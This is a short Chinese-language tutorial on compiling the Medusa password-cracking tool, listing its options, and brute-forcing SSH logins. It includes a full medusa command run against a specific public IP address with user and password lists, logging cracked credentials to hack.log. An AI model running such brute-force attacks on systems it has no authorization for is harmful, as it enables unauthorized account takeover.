medusa安装和简单使用

medusa安装和简单使用

1、手动编译安装medusa

yum install openssl-devel libssh2-devel -y #安装依赖包

tar zxvf medusa-2.2.tar.gz

cd medusa-2.2/

./configure && make -j 4 && make install

2、medusa参数说明：

-H [File] 包含目标主机名称或者IP的文件

-U [File] 包含测试的用户名文件

-p[File] 包含测试的密码文件

-O[File] 日志信息文件，保存暴力破解的结果

-M[text] 模块执行名称

-t[num] 设定线程数量

-n[num] Use for non-default TCP port number 指定非22端口号，默认22

3、爆破ssh

通过文件来指定 host 和 user，host.txt 为目标主机名称或者 IP 地址，user.txt 指定需要暴 力破解的用户名， 使用 wordlist.txt 字典进行暴破。

head -n 20 wordlist.txt > b.txt #取 20 个密码，放到 b.txt。如果直 接使用这个字典，用时太长了

echo 123456 >> b.txt #写入正确的密码

echo 219.143.129.64 > /root/host.txt #指定暴破的 IP，一行一个。

vim /root/users.txt #插入以下多个用户

medusa -M ssh -H ./host.txt -U ./users.txt -t 8 -P b.txt -O hack.log

破解成功后会显示 success 字样，并将暴解的结果放到 hack.log 中